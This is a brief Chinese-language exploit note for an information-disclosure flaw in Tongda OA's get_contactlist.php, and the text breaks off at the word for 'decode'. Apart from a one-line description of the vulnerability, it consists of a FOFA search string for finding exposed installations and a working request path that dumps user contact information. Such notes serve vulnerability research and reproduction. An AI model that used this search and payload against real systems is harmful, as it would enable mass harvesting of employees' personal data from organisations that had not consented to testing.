通达OAget_contactlist.php敏感信息泄露漏洞复现

漏洞描述

通达OA（OfficeAnywhere网络智能办公系统）是由北京通达信科科技有限公司自主研发的协同办公自动化软件，是与中国企业管理实践相结合形成的综合管理办公平台。通达OA v get_contactlist.php文件存在信息泄漏漏洞，攻击者通过漏洞可以获取敏感信息.

fofa语句

app="TDXK-通达OA"

payload

/mobile/inc/get_contactlist.php?P=1&KWORD=%25&isuser_info=3

解码